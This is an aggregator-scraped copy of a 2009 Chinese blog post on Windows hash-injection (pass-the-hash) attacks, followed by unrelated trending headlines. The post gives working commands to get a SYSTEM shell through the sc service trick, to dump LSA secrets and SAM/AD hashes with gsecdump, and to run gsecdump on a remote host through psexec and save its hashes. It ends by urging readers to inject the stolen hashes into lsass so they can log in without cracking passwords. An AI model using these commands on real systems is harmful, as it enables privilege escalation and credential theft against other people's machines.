Channel: 大西瓜的杂货铺 »攻击

X Mark channel Not-Safe-For-Work? cancel confirm NSFW Votes: (0 votes)

X Are you the publisher? Claim or contact us about this channel.

X 0

Showing article 5 of 5 in channel 18022752
Channel Details:

Title: 大西瓜的杂货铺 »攻击
Channel Number: 18022752
Language: Chinese
Registered On: June 25, 2013, 4:31 pm
Number of Articles: 5
Latest Snapshot: September 20, 2014, 12:26 am
RSS URL: http://www.daxigua.com/archives/tag/攻击/feed
Publisher: http://www.daxigua.com
Description: 互联网，网络安全，摄影，电影，杂七杂八--小聪明是战术，大智慧是战略；小聪明看到的是芝麻，大智慧看到的是西瓜。
Catalog: //unhonest74.rssing.com/catalog.php?indx=18022752

HASH注入式攻击

December 30, 2009, 5:50 am

≪ Previous: 密码学常见的攻击方法

文章作者：pt007[at]vip.sina.com
信息来源：邪恶八进制信息安全团队(www.eviloctal.com)
下载网址：
http://www.truesec.com/PublicSto … tectCookieSupport=1

To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= “C:\WINDOWS\system32\cmd.exe /K start” type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

————

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 – Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals – www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash 注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:http://truesecurity.se/blogs/mur … -text-password.aspx

↧

↧

Latest Images

重瓣臭茉莉

April 23, 2024, 7:00 am

台湾花莲县海域发生4.2级地震，震源深度8千米

台湾花莲县海域发生4.2级地震，震源深度8千米

April 23, 2024, 5:51 am

2024 Touch Taiwan智慧顯示展 ASMPT開啟未來顯示技術與應用新篇章

2024 Touch Taiwan智慧顯示展 ASMPT開啟未來顯示技術與應用新篇章

April 22, 2024, 7:51 pm

日內瓦國際發明展得獎名單出爐香港獲逾 350 獎 + 中國 70 項發明獲金獎

日內瓦國際發明展得獎名單出爐香港獲逾 350 獎 + 中國 70 項發明獲金獎

April 22, 2024, 1:30 am

【幻月字幕组】【24年日剧】【白暮的编年史】【04】【1080P】【中日双语】

【幻月字幕组】【24年日剧】【白暮的编年史】【04】【1080P】【中日双语】

April 21, 2024, 9:42 pm

【編劇自救】電影人推劇本配對平台、資助創作出版冀扭轉「階級問題」

【編劇自救】電影人推劇本配對平台、資助創作出版冀扭轉「階級問題」

April 21, 2024, 6:53 am

《柯南》劇場版影廳iPhone被喚醒？原因竟是「平次」網笑翻

《柯南》劇場版影廳iPhone被喚醒？原因竟是「平次」網笑翻

April 20, 2024, 9:25 am

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

April 20, 2024, 2:00 am

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

April 20, 2024, 2:00 am

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

April 20, 2024, 2:00 am

Trending Articles

泰语每日一词：อุ่น “温暖”，“加热”（Day 375）

October 21, 2016, 10:30 am

奔跑吧薔薇線上看第109集

May 18, 2015, 10:49 am

【SFC】初代熱血硬派+新國雄君之輓歌合集+金手指+Rom下載，熱血經典格鬥RPG！

November 26, 2015, 3:35 am

LINE 5.4.0.1550 免安裝中文版 - 取代MSN及WhatsApp的免費傳訊工具 (解壓縮密碼 azo)

November 8, 2017, 8:42 am

2023.11.01 台北市立介壽國中-數學領域-3D列印教學運用研習活動集錦

November 26, 2023, 3:32 am

[MagicStar] 特搜9 第七季 / Tokusou 9 Season7 EP01 [WEBDL] [1080p] [AMZN]【生】【附日字】

April 15, 2024, 6:11 am

POP\Exchange客户端访问日志哪里查询

June 25, 2019, 1:57 am

习近平女儿习明泽到底长啥样？疑似真颜照片罕见流出(图集)

March 20, 2018, 1:52 pm

2024年流行10种大门颜色展现住家品味

November 28, 2023, 10:00 pm

出售：英國 Chord Clearway 3m 焦去焦喇叭線

November 12, 2018, 12:16 am

開箱開箱😁 DOD RZW988電子後視鏡分享

June 11, 2023, 7:38 pm

出售: Acrolink 7N-A2200iii XLR 1.5m訊號線

November 30, 2018, 9:00 pm

越坂康史days系列：48天島村舞花、58天树花凛、38天范田纱纱、39天杏堂怜，耻辱中的情欲，暂缺68天鳴海小春！

April 8, 2017, 11:43 pm

李現素顏臉腫一圈！「隆起嘴邊肉」像含滷蛋…網：是拔智齒了嗎？

September 17, 2019, 5:24 am

Sienta 七人座豪華+菜單請益

October 16, 2020, 5:07 am

国外超经典RPG手游推荐，每一款都是必玩系列

June 19, 2018, 2:19 am

海外党媒论坛传习近平“准女婿”曝光：富二代家资百亿图

April 3, 2013, 2:49 pm

以世运占星学解析中共政权的出生盘

December 19, 2019, 10:11 am

42岁艳星郑艳丽早年被逼拍三级片（图）

January 25, 2014, 4:34 am

出售: 英國 Garrard 401 全機械黑膠唱盤 Turntable

May 16, 2018, 8:11 am

More Pages to Explore .....

Latest Images

重瓣臭茉莉

April 23, 2024, 7:00 am

台湾花莲县海域发生4.2级地震，震源深度8千米

台湾花莲县海域发生4.2级地震，震源深度8千米

April 23, 2024, 5:51 am

2024 Touch Taiwan智慧顯示展 ASMPT開啟未來顯示技術與應用新篇章

2024 Touch Taiwan智慧顯示展 ASMPT開啟未來顯示技術與應用新篇章

April 22, 2024, 7:51 pm

日內瓦國際發明展得獎名單出爐香港獲逾 350 獎 + 中國 70 項發明獲金獎

日內瓦國際發明展得獎名單出爐香港獲逾 350 獎 + 中國 70 項發明獲金獎

April 22, 2024, 1:30 am

【幻月字幕组】【24年日剧】【白暮的编年史】【04】【1080P】【中日双语】

【幻月字幕组】【24年日剧】【白暮的编年史】【04】【1080P】【中日双语】

April 21, 2024, 9:42 pm

【編劇自救】電影人推劇本配對平台、資助創作出版冀扭轉「階級問題」

【編劇自救】電影人推劇本配對平台、資助創作出版冀扭轉「階級問題」

April 21, 2024, 6:53 am

《柯南》劇場版影廳iPhone被喚醒？原因竟是「平次」網笑翻

《柯南》劇場版影廳iPhone被喚醒？原因竟是「平次」網笑翻

April 20, 2024, 9:25 am

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

April 20, 2024, 2:00 am

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

April 20, 2024, 2:00 am

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

【評測】MSI Claw　外形　手感　效能　打機體驗　散熱　屏幕 5 大優點 + 缺點開箱評測

April 20, 2024, 2:00 am

© 2024 //www.rssing.com